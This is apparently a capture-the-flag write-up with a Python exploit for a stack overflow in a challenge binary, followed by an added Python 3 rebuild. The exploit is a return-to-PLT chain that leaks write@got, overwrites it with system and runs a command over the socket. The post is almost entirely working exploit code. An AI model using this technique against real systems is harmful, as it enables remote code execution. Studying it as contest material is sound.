I didn't know what the server environment was during the contest, so I just tested on Ubuntu 13.04.


# Python 2 exploit script. All addresses come from the challenge binary and
# the libc of the test box (Ubuntu 13.04); they are specific to that setup.
from socket import *
from struct import *
import time

cmd = "id>&4\x00"   # fd 4 is the client socket, so the command output comes back over it

send_plt  = pack('<I',0x80488a0)
recv_plt  = pack('<I',0x8048780)
ppppr     = pack('<I',0x8049a0c)   # pop;pop;pop;pop;ret - clears the 4 args between calls
write_plt = pack('<I',0x8048790)
write_got = pack('<I',0x804b020)
bss       = pack('<I',0x0804b1a0)  # writable scratch area for the command string

fd = pack('<I',4)

s = socket(AF_INET,SOCK_STREAM)
s.connect(('localhost',7777))

payload = ""
payload += "A"*240                 # padding up to the saved return address

payload += send_plt                # send(4, write_got, 4, 0): leak write's libc address
payload += ppppr
payload += fd
payload += write_got
payload += pack('<I',4)
payload += "\x00"*4

payload += recv_plt                # recv(4, write_got, 4, 0): overwrite write@got with system
payload += ppppr
payload += fd
payload += write_got
payload += pack('<I',4)
payload += "\x00"*4

payload += recv_plt                # recv(4, bss, len(cmd), 0): store the command in .bss
payload += ppppr
payload += fd
payload += bss
payload += pack('<I',len(cmd))
payload += "\x00"*4

payload += write_plt               # write@plt now resolves to system: system(bss)
payload += "AAAA"                  # return address, never used
payload += bss

s.send("write"+payload)
time.sleep(0.1)
get = s.recv(1024)
# the 4 leaked bytes follow the "main" marker in the reply
write_addr = unpack('<I',get[get.find('main')+5:get.find('main')+9])[0]
print "write address: "+hex(write_addr)

system_addr = write_addr - 649808  # write - system in the tested libc
print "system address: "+hex(system_addr)
s.send(pack('<I',system_addr))     # consumed by the recv() into write@got

s.send(cmd)                        # consumed by the recv() into .bss
print s.recv(1024)                 # output of system("id>&4")
s.close()
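The chain above has a fixed shape: every call is [function][pop4-ret gadget][4 args], and the gadget's pop count has to match the argument count or the next frame lands misaligned. The following is an added example, not part of the original write-up, that rebuilds the same three-stage chain (leak write@got, overwrite it with system, stage the command) as Python 3 functions so each piece can be checked offline. It reuses the addresses and the 649808 write-to-system delta from the script; `frame`, `build_chain`, `parse_leak` and `system_from_write` are names chosen here, and the reply parsing simply mirrors the original script's "main"+5 offset, whose exact meaning depends on the challenge server.

```python
import struct

# Addresses taken from the exploit above (challenge binary, Ubuntu 13.04 libc).
SEND_PLT  = 0x80488a0
RECV_PLT  = 0x8048780
WRITE_PLT = 0x8048790
WRITE_GOT = 0x804b020
BSS       = 0x0804b1a0
PPPPR     = 0x8049a0c        # pop;pop;pop;pop;ret (assumed to pop exactly 4 words)
SOCK_FD   = 4                # the client socket inside the server process
PADDING   = 240              # bytes up to the saved return address
WRITE_SYSTEM_DELTA = 649808  # write - system in the libc the post was tested against


def p32(value):
    """Pack a 32-bit little-endian word."""
    return struct.pack('<I', value & 0xffffffff)


def frame(func, args, cleanup=PPPPR):
    """One ret2plt call frame: func, return-into-gadget, then the arguments.

    The gadget is what makes the chain continue: after func returns, the
    pops discard the arguments so the next frame's func address is on top.
    With pop4ret that only works for exactly four arguments.
    """
    if cleanup == PPPPR and len(args) != 4:
        raise ValueError("pop4ret cleans exactly four arguments, got %d" % len(args))
    return p32(func) + p32(cleanup) + b''.join(p32(a) for a in args)


def build_chain(cmd):
    """Rebuild the original three-stage payload for a NUL-terminated command."""
    if not cmd.endswith(b'\x00'):
        raise ValueError("system() needs a NUL-terminated string")
    chain = b'A' * PADDING
    chain += frame(SEND_PLT, [SOCK_FD, WRITE_GOT, 4, 0])    # leak write@got over the socket
    chain += frame(RECV_PLT, [SOCK_FD, WRITE_GOT, 4, 0])    # overwrite write@got with system
    chain += frame(RECV_PLT, [SOCK_FD, BSS, len(cmd), 0])   # stage the command in .bss
    chain += p32(WRITE_PLT) + b'AAAA' + p32(BSS)            # write@plt -> system(bss); no return needed
    return chain


def parse_leak(reply, marker=b'main'):
    """Mirror the original parsing: the leaked word sits at marker + 5."""
    i = reply.find(marker)
    if i < 0 or len(reply) < i + 9:
        raise ValueError("leak marker not found in reply")
    return struct.unpack('<I', reply[i + 5:i + 9])[0]


def system_from_write(write_addr, delta=WRITE_SYSTEM_DELTA):
    """Derive system's address from the leaked write address (same libc build)."""
    return write_addr - delta


if __name__ == '__main__':
    cmd = b"id>&4\x00"
    chain = build_chain(cmd)
    print("chain length: %d bytes" % len(chain))
    # Constructed reply, standing in for what the server sent back.
    fake_reply = b'xxmainQ' + p32(0xf7e5a000) + b'tail'
    leaked = parse_leak(fake_reply)
    print("write: %#x  system: %#x" % (leaked, system_from_write(leaked)))
```

Each frame is 24 bytes (function, gadget, four words), so the three frames start at offsets 240, 264 and 288 of the chain and the final `write@plt` call sits at 312; if the binary's gadget popped a different number of words, `frame` would need a matching gadget per argument count rather than a single `PPPPR`.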


posted by tunz